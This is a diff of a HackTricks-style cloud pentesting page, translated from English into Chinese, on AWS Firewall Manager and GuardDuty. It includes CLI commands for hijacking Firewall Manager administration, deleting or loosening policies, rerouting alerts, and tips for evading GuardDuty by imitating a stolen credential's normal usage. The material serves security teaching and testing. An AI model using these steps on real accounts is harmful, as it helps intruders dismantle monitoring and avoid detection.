consistent security enforcement across all regions where your organization operates. +1. **加入并配置 AWS Organizations**:确保您的 AWS 账户是计划实施 AWS Firewall Manager 策略的 AWS Organizations 组织的一部分。这允许在组织内多个 AWS 账户之间集中管理资源和政策。 +2. **创建 AWS Firewall Manager 默认管理员账户**:建立一个专门用于管理 Firewall Manager 安全策略的默认管理员账户。该账户将负责在组织内配置和强制执行安全策略。只有组织的管理账户能够创建 Firewall Manager 默认管理员账户。 +3. **启用 AWS Config**:激活 AWS Config,以为 Firewall Manager 提供有效强制执行安全策略所需的配置数据和洞察。AWS Config 有助于分析、审计、监控和审计资源配置和更改,促进更好的安全管理。 +4. **对于第三方政策,在 AWS Marketplace 订阅并配置第三方设置**:如果您计划使用第三方防火墙政策,请在 AWS Marketplace 中订阅它们并配置必要的设置。此步骤确保 Firewall Manager 可以集成并强制执行来自受信任第三方供应商的政策。 +5. **对于网络防火墙和 DNS 防火墙政策,启用资源共享**:专门为网络防火墙和 DNS 防火墙政策启用资源共享。这允许 Firewall Manager 将防火墙保护应用于您组织的 VPC 和 DNS 解析,增强网络安全。 +6. **在默认禁用的区域使用 AWS Firewall Manager**:如果您打算在默认禁用的 AWS 区域使用 Firewall Manager,请确保采取必要步骤以启用其在这些区域的功能。这确保在您组织运营的所有区域内一致的安全强制执行。 -For more information, check: [Getting started with AWS Firewall Manager AWS WAF policies](https://docs.aws.amazon.com/waf/latest/developerguide/getting-started-fms.html). +有关更多信息,请查看:[开始使用 AWS Firewall Manager AWS WAF 策略](https://docs.aws.amazon.com/waf/latest/developerguide/getting-started-fms.html)。 ### Types of protection policies -AWS Firewall Manager manages several types of policies to enforce security controls across different aspects of your organization's infrastructure: +AWS Firewall Manager 管理几种类型的政策,以在您组织基础设施的不同方面强制执行安全控制: -1. **AWS WAF Policy:** This policy type supports both AWS WAF and AWS WAF Classic. You can define which resources are protected by the policy. For AWS WAF policies, you can specify sets of rule groups to run first and last in the web ACL. Additionally, account owners can add rules and rule groups to run in between these sets. -2. 
**Shield Advanced Policy:** This policy applies Shield Advanced protections across your organization for specified resource types. It helps safeguard against DDoS attacks and other threats. -3. **Amazon VPC Security Group Policy:** With this policy, you can manage security groups used throughout your organization, enforcing a baseline set of rules across your AWS environment to control network access. -4. **Amazon VPC Network Access Control List (ACL) Policy:** This policy type gives you control over network ACLs used in your organization, allowing you to enforce a baseline set of network ACLs across your AWS environment. -5. **Network Firewall Policy:** This policy applies AWS Network Firewall protection to your organization's VPCs, enhancing network security by filtering traffic based on predefined rules. -6. **Amazon Route 53 Resolver DNS Firewall Policy:** This policy applies DNS Firewall protections to your organization's VPCs, helping to block malicious domain resolution attempts and enforce security policies for DNS traffic. -7. **Third-Party Firewall Policy:** This policy type applies protections from third-party firewalls, which are available by subscription through the AWS Marketplace console. It allows you to integrate additional security measures from trusted vendors into your AWS environment. - 1. **Palo Alto Networks Cloud NGFW Policy:** This policy applies Palo Alto Networks Cloud Next Generation Firewall (NGFW) protections and rulestacks to your organization's VPCs, providing advanced threat prevention and application-level security controls. - 2. **Fortigate Cloud Native Firewall (CNF) as a Service Policy:** This policy applies Fortigate Cloud Native Firewall (CNF) as a Service protections, offering industry-leading threat prevention, web application firewall (WAF), and API protection tailored for cloud infrastructures. +1. **AWS WAF 策略**:此策略类型支持 AWS WAF 和 AWS WAF Classic。您可以定义哪些资源受到该策略的保护。对于 AWS WAF 策略,您可以指定要首先和最后运行的规则组集合。此外,账户所有者可以添加在这些集合之间运行的规则和规则组。 +2. **Shield Advanced 策略**:此策略在您的组织中对指定资源类型应用 Shield Advanced 保护。它有助于防范 DDoS 攻击和其他威胁。 +3. **Amazon VPC 安全组策略**:通过此策略,您可以管理在整个组织中使用的安全组,在您的 AWS 环境中强制执行一组基线规则以控制网络访问。 +4. **Amazon VPC 网络访问控制列表 (ACL) 策略**:此策略类型使您能够控制在组织中使用的网络 ACL,允许您在 AWS 环境中强制执行一组基线网络 ACL。 +5. **网络防火墙策略**:此策略将 AWS 网络防火墙保护应用于您组织的 VPC,增强网络安全,通过预定义规则过滤流量。 +6. **Amazon Route 53 解析器 DNS 防火墙策略**:此策略将 DNS 防火墙保护应用于您组织的 VPC,帮助阻止恶意域名解析尝试并强制执行 DNS 流量的安全策略。 +7. **第三方防火墙策略**:此策略类型应用来自第三方防火墙的保护,这些防火墙通过 AWS Marketplace 控制台提供订阅。它允许您将来自受信任供应商的额外安全措施集成到您的 AWS 环境中。 +1. **Palo Alto Networks Cloud NGFW 策略**:此策略将 Palo Alto Networks Cloud 下一代防火墙 (NGFW) 保护和规则堆栈应用于您组织的 VPC,提供高级威胁防护和应用级安全控制。 +2. **Fortigate Cloud Native Firewall (CNF) 作为服务策略**:此策略应用 Fortigate Cloud Native Firewall (CNF) 作为服务的保护,提供行业领先的威胁防护、Web 应用防火墙 (WAF) 和针对云基础设施的 API 保护。 ### Administrator accounts -AWS Firewall Manager offers flexibility in managing firewall resources within your organization through its administrative scope and two types of administrator accounts. +AWS Firewall Manager 通过其管理范围和两种类型的管理员账户提供灵活性,以管理您组织内的防火墙资源。 -**Administrative scope defines the resources that a Firewall Manager administrator can manage**. After an AWS Organizations management account onboards an organization to Firewall Manager, it can create additional administrators with different administrative scopes. These scopes can include: +**管理范围定义了 Firewall Manager 管理员可以管理的资源**。在 AWS Organizations 管理账户将组织引入 Firewall Manager 后,它可以创建具有不同管理范围的其他管理员。这些范围可以包括: -- Accounts or organizational units (OUs) that the administrator can apply policies to. 
-- Regions where the administrator can perform actions. -- Firewall Manager policy types that the administrator can manage. +- 管理员可以应用政策的账户或组织单位 (OU)。 +- 管理员可以执行操作的区域。 +- 管理员可以管理的 Firewall Manager 策略类型。 -Administrative scope can be either **full or restricted**. Full scope grants the administrator access to **all specified resource types, regions, and policy types**. In contrast, **restricted scope provides administrative permission to only a subset of resources, regions, or policy types**. It's advisable to grant administrators only the permissions they need to fulfill their roles effectively. You can apply any combination of these administrative scope conditions to an administrator, ensuring adherence to the principle of least privilege. +管理范围可以是 **完全或受限**。完全范围授予管理员对 **所有指定资源类型、区域和策略类型** 的访问权限。相反,**受限范围仅提供对资源、区域或策略类型的子集的管理权限**。建议仅授予管理员完成其角色所需的权限。您可以将这些管理范围条件的任意组合应用于管理员,以确保遵循最小权限原则。 -There are two distinct types of administrator accounts, each serving specific roles and responsibilities: +有两种不同类型的管理员账户,每种账户都有特定的角色和责任: -- **Default Administrator:** - - The default administrator account is created by the AWS Organizations organization's management account during the onboarding process to Firewall Manager. - - This account has the capability to manage third-party firewalls and possesses full administrative scope. - - It serves as the primary administrator account for Firewall Manager, responsible for configuring and enforcing security policies across the organization. - - While the default administrator has full access to all resource types and administrative functionalities, it operates at the same peer level as other administrators if multiple administrators are utilized within the organization. -- **Firewall Manager Administrators:** - - These administrators can manage resources within the scope designated by the AWS Organizations management account, as defined by the administrative scope configuration. - - Firewall Manager administrators are created to fulfill specific roles within the organization, allowing for delegation of responsibilities while maintaining security and compliance standards. - - Upon creation, Firewall Manager checks with AWS Organizations to determine if the account is already a delegated administrator. If not, Firewall Manager calls Organizations to designate the account as a delegated administrator for Firewall Manager. +- **默认管理员**: +- 默认管理员账户由 AWS Organizations 组织的管理账户在引入 Firewall Manager 过程中创建。 +- 该账户能够管理第三方防火墙,并拥有完全的管理范围。 +- 它作为 Firewall Manager 的主要管理员账户,负责在组织内配置和强制执行安全策略。 +- 虽然默认管理员对所有资源类型和管理功能具有完全访问权限,但如果在组织内使用多个管理员,它与其他管理员处于同一对等级别。 +- **Firewall Manager 管理员**: +- 这些管理员可以在 AWS Organizations 管理账户指定的范围内管理资源,如管理范围配置所定义的那样。 +- Firewall Manager 管理员是为了在组织内履行特定角色而创建的,允许在保持安全和合规标准的同时进行责任的委派。 +- 创建后,Firewall Manager 会与 AWS Organizations 检查该账户是否已经是委派管理员。如果不是,Firewall Manager 会调用 Organizations 将该账户指定为 Firewall Manager 的委派管理员。 -Managing these administrator accounts involves creating them within Firewall Manager and defining their administrative scopes according to the organization's security requirements and the principle of least privilege. By assigning appropriate administrative roles, organizations can ensure effective security management while maintaining granular control over access to sensitive resources. 
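A read-only sketch for checking how Firewall Manager administration is currently delegated before touching anything (the account ID is a placeholder; the multi-administrator operations shown here assume a reasonably recent AWS CLI):

```bash
# Current Firewall Manager default administrator and the status of the association
aws fms get-admin-account

# Additional Firewall Manager administrators created by the management account
aws fms list-admin-accounts-for-organization

# Administrative scope (accounts/OUs, Regions, policy types) granted to one administrator
aws fms get-admin-scope --admin-account 123456789012
```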
+管理这些管理员账户涉及在 Firewall Manager 中创建它们,并根据组织的安全要求和最小权限原则定义其管理范围。通过分配适当的管理角色,组织可以确保有效的安全管理,同时保持对敏感资源访问的细粒度控制。 -It is important to highlight that **only one account within an organization can serve as the Firewall Manager default administrator**, adhering to the principle of "**first in, last out**". To designate a new default administrator, a series of steps must be followed: +重要的是要强调,**在一个组织内只能有一个账户作为 Firewall Manager 默认管理员**,遵循“**先入后出**”原则。要指定新的默认管理员,必须遵循一系列步骤: -- First, each Firewall Administrator administrator account must revoke their own account. -- Then, the existing default administrator can revoke their own account, effectively offboarding the organization from Firewall Manager. This process results in the deletion of all Firewall Manager policies created by the revoked account. -- To conclude, the AWS Organizations management account must designate the Firewall Manager dafault administrator. +- 首先,每个 Firewall Administrator 管理员账户必须撤销自己的账户。 +- 然后,现有的默认管理员可以撤销自己的账户,有效地将组织从 Firewall Manager 中移除。此过程将导致撤销账户创建的所有 Firewall Manager 策略被删除。 +- 最后,AWS Organizations 管理账户必须指定 Firewall Manager 默认管理员。 ## Enumeration - ``` # Users/Administrators @@ -162,66 +161,58 @@ aws fms get-third-party-firewall-association-status --third-party-firewall --member-account --resource-id --resource-type ``` - ## Post Exploitation / Bypass Detection ### `organizations:DescribeOrganization` & (`fms:AssociateAdminAccount`, `fms:DisassociateAdminAccount`, `fms:PutAdminAccount`) -An attacker with the **`fms:AssociateAdminAccount`** permission would be able to set the Firewall Manager default administrator account. With the **`fms:PutAdminAccount`** permission, an attacker would be able to create or updatea Firewall Manager administrator account and with the **`fms:DisassociateAdminAccount`** permission, a potential attacker could remove the current Firewall Manager administrator account association. - -- The disassociation of the **Firewall Manager default administrator follows the first-in-last-out policy**. All the Firewall Manager administrators must disassociate before the Firewall Manager default administrator can disassociate the account. -- In order to create a Firewall Manager administrator by **PutAdminAccount**, the account must belong to the organization that was previously onboarded to Firewall Manager using **AssociateAdminAccount**. -- The creation of a Firewall Manager administrator account can only be done by the organization's management account. +拥有 **`fms:AssociateAdminAccount`** 权限的攻击者将能够设置防火墙管理器默认管理员账户。拥有 **`fms:PutAdminAccount`** 权限的攻击者将能够创建或更新防火墙管理器管理员账户,而拥有 **`fms:DisassociateAdminAccount`** 权限的潜在攻击者可以移除当前的防火墙管理器管理员账户关联。 +- **防火墙管理器默认管理员的解除关联遵循先进后出政策**。所有防火墙管理器管理员必须解除关联,才能让防火墙管理器默认管理员解除账户关联。 +- 要通过 **PutAdminAccount** 创建防火墙管理器管理员,账户必须属于之前通过 **AssociateAdminAccount** 加入防火墙管理器的组织。 +- 防火墙管理器管理员账户的创建只能由组织的管理账户完成。 ```bash aws fms associate-admin-account --admin-account aws fms disassociate-admin-account aws fms put-admin-account --admin-account ``` - -**Potential Impact:** Loss of centralized management, policy evasion, compliance violations, and disruption of security controls within the environment. +**潜在影响:** 中心化管理的丧失、策略规避、合规性违规以及环境中安全控制的中断。 ### `fms:PutPolicy`, `fms:DeletePolicy` -An attacker with the **`fms:PutPolicy`**, **`fms:DeletePolicy`** permissions would be able to create, modify or permanently delete an AWS Firewall Manager policy. 
- +拥有 **`fms:PutPolicy`**、**`fms:DeletePolicy`** 权限的攻击者将能够创建、修改或永久删除 AWS Firewall Manager 策略。 ```bash aws fms put-policy --policy | --cli-input-json file:// [--tag-list ] aws fms delete-policy --policy-id [--delete-all-policy-resources | --no-delete-all-policy-resources] ``` - -An example of permisive policy through permisive security group, in order to bypass the detection, could be the following one: - +一个通过宽松安全组的宽松策略示例,为了绕过检测,可以是以下内容: ```json { - "Policy": { - "PolicyName": "permisive_policy", - "SecurityServicePolicyData": { - "Type": "SECURITY_GROUPS_COMMON", - "ManagedServiceData": "{\"type\":\"SECURITY_GROUPS_COMMON\",\"securityGroups\":[{\"id\":\"\"}], \"applyToAllEC2InstanceENIs\":\"true\",\"IncludeSharedVPC\":\"true\"}" - }, - "ResourceTypeList": [ - "AWS::EC2::Instance", - "AWS::EC2::NetworkInterface", - "AWS::EC2::SecurityGroup", - "AWS::ElasticLoadBalancingV2::LoadBalancer", - "AWS::ElasticLoadBalancing::LoadBalancer" - ], - "ResourceType": "AWS::EC2::SecurityGroup", - "ExcludeResourceTags": false, - "ResourceTags": [], - "RemediationEnabled": true - }, - "TagList": [] +"Policy": { +"PolicyName": "permisive_policy", +"SecurityServicePolicyData": { +"Type": "SECURITY_GROUPS_COMMON", +"ManagedServiceData": "{\"type\":\"SECURITY_GROUPS_COMMON\",\"securityGroups\":[{\"id\":\"\"}], \"applyToAllEC2InstanceENIs\":\"true\",\"IncludeSharedVPC\":\"true\"}" +}, +"ResourceTypeList": [ +"AWS::EC2::Instance", +"AWS::EC2::NetworkInterface", +"AWS::EC2::SecurityGroup", +"AWS::ElasticLoadBalancingV2::LoadBalancer", +"AWS::ElasticLoadBalancing::LoadBalancer" +], +"ResourceType": "AWS::EC2::SecurityGroup", +"ExcludeResourceTags": false, +"ResourceTags": [], +"RemediationEnabled": true +}, +"TagList": [] } ``` - -**Potential Impact:** Dismantling of security controls, policy evasion, compliance violations, operational disruptions, and potential data breaches within the environment. +**潜在影响:** 安全控制的拆解、政策规避、合规性违规、操作中断,以及环境中潜在的数据泄露。 ### `fms:BatchAssociateResource`, `fms:BatchDisassociateResource`, `fms:PutResourceSet`, `fms:DeleteResourceSet` -An attacker with the **`fms:BatchAssociateResource`** and **`fms:BatchDisassociateResource`** permissions would be able to associate or disassociate resources from a Firewall Manager resource set respectively. In addition, the **`fms:PutResourceSet`** and **`fms:DeleteResourceSet`** permissions would allow an attacker to create, modify or delete these resource sets from AWS Firewall Manager. - +拥有 **`fms:BatchAssociateResource`** 和 **`fms:BatchDisassociateResource`** 权限的攻击者将能够分别将资源关联或取消关联到防火墙管理器资源集。此外,**`fms:PutResourceSet`** 和 **`fms:DeleteResourceSet`** 权限将允许攻击者创建、修改或删除这些资源集。 ```bash # Associate/Disassociate resources from a resource set aws fms batch-associate-resource --resource-set-identifier --items @@ -231,83 +222,68 @@ aws fms batch-disassociate-resource --resource-set-identifier --items [--tag-list ] aws fms delete-resource-set --identifier ``` - -**Potential Impact:** The addition of an unnecessary amount of items to a resource set will increase the level of noise in the Service potentially causing a DoS. In addition, changes of the resource sets could lead to a resource disruption, policy evasion, compliance violations, and disruption of security controls within the environment. 
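For illustration only, a hypothetical resource set limited to security groups and the association of one resource with it (names, IDs and the ARN are made-up placeholders):

```bash
# Create or update a resource set; the call returns the resource set identifier
aws fms put-resource-set \
  --resource-set '{"Name":"example-set","Description":"demo","ResourceTypeList":["AWS::EC2::SecurityGroup"]}'

# Attach a concrete resource (by ARN) to that set
aws fms batch-associate-resource \
  --resource-set-identifier <resource-set-id> \
  --items arn:aws:ec2:us-east-1:123456789012:security-group/sg-0123456789abcdef0
```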
+**潜在影响:** 向资源集添加不必要的项目将增加服务中的噪音水平,可能导致DoS。此外,资源集的变化可能导致资源中断、策略规避、合规性违规以及环境中安全控制的中断。 ### `fms:PutAppsList`, `fms:DeleteAppsList` -An attacker with the **`fms:PutAppsList`** and **`fms:DeleteAppsList`** permissions would be able to create, modify or delete application lists from AWS Firewall Manager. This could be critical, as unauthorized applications could be allowed access to the general public, or access to authorized applications could be denied, causing a DoS. - +拥有**`fms:PutAppsList`**和**`fms:DeleteAppsList`**权限的攻击者将能够创建、修改或删除AWS Firewall Manager中的应用程序列表。这可能是关键的,因为未经授权的应用程序可能被允许访问公众,或者对授权应用程序的访问可能被拒绝,从而导致DoS。 ```bash aws fms put-apps-list --apps-list [--tag-list ] aws fms delete-apps-list --list-id ``` - -**Potential Impact:** This could result in misconfigurations, policy evasion, compliance violations, and disruption of security controls within the environment. +**潜在影响:** 这可能导致配置错误、政策规避、合规性违规以及环境中安全控制的中断。 ### `fms:PutProtocolsList`, `fms:DeleteProtocolsList` -An attacker with the **`fms:PutProtocolsList`** and **`fms:DeleteProtocolsList`** permissions would be able to create, modify or delete protocols lists from AWS Firewall Manager. Similarly as with applications lists, this could be critical since unauthorized protocols could be used by the general public, or the use of authorized protocols could be denied, causing a DoS. - +拥有 **`fms:PutProtocolsList`** 和 **`fms:DeleteProtocolsList`** 权限的攻击者将能够从 AWS Firewall Manager 创建、修改或删除协议列表。与应用程序列表类似,这可能是关键的,因为未经授权的协议可能被公众使用,或者授权协议的使用可能被拒绝,从而导致 DoS。 ```bash aws fms put-protocols-list --apps-list [--tag-list ] aws fms delete-protocols-list --list-id ``` - -**Potential Impact:** This could result in misconfigurations, policy evasion, compliance violations, and disruption of security controls within the environment. +**潜在影响:** 这可能导致配置错误、策略规避、合规性违规以及环境中安全控制的中断。 ### `fms:PutNotificationChannel`, `fms:DeleteNotificationChannel` -An attacker with the **`fms:PutNotificationChannel`** and **`fms:DeleteNotificationChannel`** permissions would be able to delete and designate the IAM role and Amazon Simple Notification Service (SNS) topic that Firewall Manager uses to record SNS logs. +拥有 **`fms:PutNotificationChannel`** 和 **`fms:DeleteNotificationChannel`** 权限的攻击者将能够删除和指定 Firewall Manager 用于记录 SNS 日志的 IAM 角色和 Amazon Simple Notification Service (SNS) 主题。 -To use **`fms:PutNotificationChannel`** outside of the console, you need to set up the SNS topic's access policy, allowing the specified **SnsRoleName** to publish SNS logs. If the provided **SnsRoleName** is a role other than the **`AWSServiceRoleForFMS`**, it requires a trust relationship configured to permit the Firewall Manager service principal **fms.amazonaws.com** to assume this role. +要在控制台外使用 **`fms:PutNotificationChannel`**,您需要设置 SNS 主题的访问策略,允许指定的 **SnsRoleName** 发布 SNS 日志。如果提供的 **SnsRoleName** 是除 **`AWSServiceRoleForFMS`** 之外的角色,则需要配置信任关系,以允许 Firewall Manager 服务主体 **fms.amazonaws.com** 假设该角色。 -For information about configuring an SNS access policy: +有关配置 SNS 访问策略的信息: {{#ref}} ../aws-sns-enum.md {{#endref}} - ```bash aws fms put-notification-channel --sns-topic-arn --sns-role-name aws fms delete-notification-channel ``` - -**Potential Impact:** This would potentially lead to miss security alerts, delayed incident response, potential data breaches and operational disruptions within the environment. 
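A hedged sketch of the SNS side mentioned above: before pointing the notification channel at a topic you control, the topic's access policy has to allow the Firewall Manager service principal to publish to it (topic ARN, role ARN and account ID are placeholders):

```bash
# Let fms.amazonaws.com publish to the (attacker-controlled) topic
aws sns set-topic-attributes \
  --topic-arn arn:aws:sns:us-east-1:123456789012:fms-notifications \
  --attribute-name Policy \
  --attribute-value '{"Version":"2012-10-17","Statement":[{"Sid":"AllowFMSPublish","Effect":"Allow","Principal":{"Service":"fms.amazonaws.com"},"Action":"sns:Publish","Resource":"arn:aws:sns:us-east-1:123456789012:fms-notifications"}]}'

# Then register the channel (the role must be assumable by fms.amazonaws.com unless it is AWSServiceRoleForFMS)
aws fms put-notification-channel \
  --sns-topic-arn arn:aws:sns:us-east-1:123456789012:fms-notifications \
  --sns-role-name arn:aws:iam::123456789012:role/fms-sns-role
```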
+**潜在影响:** 这可能导致错过安全警报、延迟事件响应、潜在的数据泄露和环境内的操作中断。 ### `fms:AssociateThirdPartyFirewall`, `fms:DisssociateThirdPartyFirewall` -An attacker with the **`fms:AssociateThirdPartyFirewall`**, **`fms:DisssociateThirdPartyFirewall`** permissions would be able to associate or disassociate third-party firewalls from being managed centrally through AWS Firewall Manager. +拥有 **`fms:AssociateThirdPartyFirewall`**、**`fms:DisssociateThirdPartyFirewall`** 权限的攻击者将能够将第三方防火墙关联或取消关联,以便通过 AWS Firewall Manager 进行集中管理。 > [!WARNING] -> Only the default administrator can create and manage third-party firewalls. - +> 只有默认管理员可以创建和管理第三方防火墙。 ```bash aws fms associate-third-party-firewall --third-party-firewall [PALO_ALTO_NETWORKS_CLOUD_NGFW | FORTIGATE_CLOUD_NATIVE_FIREWALL] aws fms disassociate-third-party-firewall --third-party-firewall [PALO_ALTO_NETWORKS_CLOUD_NGFW | FORTIGATE_CLOUD_NATIVE_FIREWALL] ``` - -**Potential Impact:** The disassociation would lead to a policy evasion, compliance violations, and disruption of security controls within the environment. The association on the other hand would lead to a disruption of cost and budget allocation. +**潜在影响:** 解除关联将导致政策规避、合规性违规以及环境内安全控制的中断。另一方面,关联将导致成本和预算分配的中断。 ### `fms:TagResource`, `fms:UntagResource` -An attacker would be able to add, modify, or remove tags from Firewall Manager resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags. - +攻击者将能够添加、修改或删除防火墙管理器资源的标签,从而干扰您组织的成本分配、资源跟踪和基于标签的访问控制政策。 ```bash aws fms tag-resource --resource-arn --tag-list aws fms untag-resource --resource-arn --tag-keys ``` +**潜在影响**:成本分配、资源跟踪和基于标签的访问控制策略的中断。 -**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies. - -## References +## 参考文献 - [https://docs.aws.amazon.com/govcloud-us/latest/UserGuide/govcloud-fms.html](https://docs.aws.amazon.com/govcloud-us/latest/UserGuide/govcloud-fms.html) - [https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsfirewallmanager.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsfirewallmanager.html) - [https://docs.aws.amazon.com/waf/latest/developerguide/fms-chapter.html](https://docs.aws.amazon.com/waf/latest/developerguide/fms-chapter.html) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md index 2794852d3..4aaa68809 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md @@ -4,64 +4,63 @@ ## GuardDuty -According to the [**docs**](https://aws.amazon.com/guardduty/features/): GuardDuty combines **machine learning, anomaly detection, network monitoring, and malicious file discovery**, using both AWS and industry-leading third-party sources to help protect workloads and data on AWS. GuardDuty is capable of analysing tens of billions of events across multiple AWS data sources, such as AWS CloudTrail event logs, Amazon Virtual Private Cloud (VPC) Flow Logs, Amazon Elastic Kubernetes Service (EKS) audit and system-level logs, and DNS query logs. 
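From an attacker's point of view, a first low-noise check is whether GuardDuty is even enabled in the Region you are working in and which data sources it consumes (read-only, assumes `guardduty:ListDetectors` / `guardduty:GetDetector`):

```bash
# An empty DetectorIds list means GuardDuty is not enabled in this Region
aws guardduty list-detectors --region us-east-1

# Status and enabled data sources (S3 logs, EKS audit logs, malware protection, ...) of a detector
aws guardduty get-detector --detector-id <detector-id> --region us-east-1
```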
+根据[**文档**](https://aws.amazon.com/guardduty/features/): GuardDuty结合了**机器学习、异常检测、网络监控和恶意文件发现**,利用AWS和行业领先的第三方来源来帮助保护AWS上的工作负载和数据。GuardDuty能够分析数十亿个事件,跨多个AWS数据源,如AWS CloudTrail事件日志、Amazon虚拟私有云(VPC)流日志、Amazon弹性Kubernetes服务(EKS)审计和系统级日志,以及DNS查询日志。 -Amazon GuardDuty **identifies unusual activity within your accounts**, analyses the **security relevanc**e of the activity, and gives the **context** in which it was invoked. This allows a responder to determine if they should spend time on further investigation. +Amazon GuardDuty **识别您账户内的异常活动**,分析该活动的**安全相关性**,并提供其被调用的**上下文**。这使得响应者能够判断是否应该花时间进行进一步调查。 -Alerts **appear in the GuardDuty console (90 days)** and CloudWatch Events. +警报**出现在GuardDuty控制台(90天)**和CloudWatch事件中。 > [!WARNING] -> When a user **disable GuardDuty**, it will stop monitoring your AWS environment and it won't generate any new findings at all, and the **existing findings will be lost**.\ -> If you just stop it, the existing findings will remain. +> 当用户**禁用GuardDuty**时,它将停止监控您的AWS环境,并且不会生成任何新的发现,**现有发现将丢失**。\ +> 如果您只是停止它,现有发现将保留。 -### Findings Example +### 发现示例 -- **Reconnaissance**: Activity suggesting reconnaissance by an attacker, such as **unusual API activity**, suspicious database **login** attempts, intra-VPC **port scanning**, unusual failed login request patterns, or unblocked port probing from a known bad IP. -- **Instance compromise**: Activity indicating an instance compromise, such as **cryptocurrency mining, backdoor command and control (C\&C)** activity, malware using domain generation algorithms (DGA), outbound denial of service activity, unusually **high network** traffic volume, unusual network protocols, outbound instance communication with a known malicious IP, temporary Amazon EC2 credentials used by an external IP address, and data exfiltration using DNS. -- **Account compromise**: Common patterns indicative of account compromise include API calls from an unusual geolocation or anonymizing proxy, attempts to disable AWS CloudTrail logging, changes that weaken the account password policy, unusual instance or infrastructure launches, infrastructure deployments in an unusual region, credential theft, suspicious database login activity, and API calls from known malicious IP addresses. -- **Bucket compromise**: Activity indicating a bucket compromise, such as suspicious data access patterns indicating credential misuse, unusual Amazon S3 API activity from a remote host, unauthorized S3 access from known malicious IP addresses, and API calls to retrieve data in S3 buckets from a user with no prior history of accessing the bucket or invoked from an unusual location. Amazon GuardDuty continuously monitors and analyzes AWS CloudTrail S3 data events (e.g. GetObject, ListObjects, DeleteObject) to detect suspicious activity across all of your Amazon S3 buckets. +- **侦察**: 表示攻击者进行侦察的活动,例如**异常API活动**、可疑的数据库**登录**尝试、VPC内**端口扫描**、异常的失败登录请求模式,或来自已知恶意IP的未阻止端口探测。 +- **实例被攻破**: 表示实例被攻破的活动,例如**加密货币挖矿、后门命令与控制(C\&C)**活动、使用域生成算法(DGA)的恶意软件、出站拒绝服务活动、异常的**高网络**流量、异常的网络协议、与已知恶意IP的出站实例通信、外部IP地址使用的临时Amazon EC2凭证,以及使用DNS的数据外泄。 +- **账户被攻破**: 表示账户被攻破的常见模式包括来自异常地理位置或匿名代理的API调用、尝试禁用AWS CloudTrail日志、削弱账户密码策略的更改、异常的实例或基础设施启动、在异常区域的基础设施部署、凭证盗窃、可疑的数据库登录活动,以及来自已知恶意IP地址的API调用。 +- **存储桶被攻破**: 表示存储桶被攻破的活动,例如可疑的数据访问模式表明凭证被滥用、来自远程主机的异常Amazon S3 API活动、来自已知恶意IP地址的未授权S3访问,以及从没有先前访问存储桶历史的用户或从异常位置调用的API获取S3存储桶中的数据。Amazon GuardDuty持续监控和分析AWS CloudTrail S3数据事件(例如GetObject、ListObjects、DeleteObject),以检测您所有Amazon S3存储桶中的可疑活动。
-Finding Information +发现信息 -Finding summary: +发现摘要: -- Finding type -- Severity: 7-8.9 High, 4-6.9 Medium, 01-3.9 Low -- Region -- Account ID -- Resource ID -- Time of detection -- Which threat list was used +- 发现类型 +- 严重性:7-8.9 高,4-6.9 中,01-3.9 低 +- 区域 +- 账户ID +- 资源ID +- 检测时间 +- 使用了哪个威胁列表 -The body has this information: +主体包含以下信息: -- Resource affected -- Action -- Actor: Ip address, port and domain -- Additional Information +- 受影响的资源 +- 操作 +- 行为者:IP地址、端口和域 +- 额外信息
-### All Findings +### 所有发现 -Access a list of all the GuardDuty findings in: [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html) +访问所有GuardDuty发现的列表: [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html) -### Multi Accounts +### 多账户 -#### By Invitation +#### 通过邀请 -You can **invite other accounts** to a different AWS GuardDuty account so **every account is monitored from the same GuardDuty**. The master account must invite the member accounts and then the representative of the member account must accept the invitation. +您可以**邀请其他账户**到不同的AWS GuardDuty账户,以便**每个账户都从同一个GuardDuty进行监控**。主账户必须邀请成员账户,然后成员账户的代表必须接受邀请。 -#### Via Organization +#### 通过组织 -You can designate any account within the organization to be the **GuardDuty delegated administrator**. Only the organization management account can designate a delegated administrator. +您可以指定组织内的任何账户为**GuardDuty委派管理员**。只有组织管理账户可以指定委派管理员。 -An account that gets designated as a delegated administrator becomes a GuardDuty administrator account, has GuardDuty enabled automatically in the designated AWS Region, and also has the **permission to enable and manage GuardDuty for all of the accounts in the organization within that Region**. The other accounts in the organization can be viewed and added as GuardDuty member accounts associated with this delegated administrator account. - -## Enumeration +被指定为委派管理员的账户成为GuardDuty管理员账户,在指定的AWS区域自动启用GuardDuty,并且还**有权限在该区域内为组织中的所有账户启用和管理GuardDuty**。组织中的其他账户可以被视为与此委派管理员账户关联的GuardDuty成员账户。 +## 枚举 ```bash # Get Org config aws guardduty list-organization-admin-accounts #Get Delegated Administrator @@ -101,85 +100,76 @@ aws guardduty list-publishing-destinations --detector-id aws guardduty list-threat-intel-sets --detector-id aws guardduty get-threat-intel-set --detector-id --threat-intel-set-id ``` - ## GuardDuty Bypass ### General Guidance -Try to find out as much as possible about the behaviour of the credentials you are going to use: +尽量多了解你将要使用的凭证的行为: -- Times it's used -- Locations -- User Agents / Services (It could be used from awscli, webconsole, lambda...) -- Permissions regularly used +- 使用时间 +- 位置 +- 用户代理 / 服务(可以通过awscli、webconsole、lambda等使用) +- 定期使用的权限 -With this information, recreate as much as possible the same scenario to use the access: +根据这些信息,尽可能重现相同的场景以使用访问权限: -- If it's a **user or a role accessed by a user**, try to use it in the same hours, from the same geolocation (even the same ISP and IP if possible) -- If it's a **role used by a service**, create the same service in the same region and use it from there in the same time ranges -- Always try to use the **same permissions** this principal has used -- If you need to **use other permissions or abuse a permission** (for example, download 1.000.000 cloudtrail log files) do it **slowly** and with the **minimum amount of interactions** with AWS (awscli sometime call several read APIs before the write one) +- 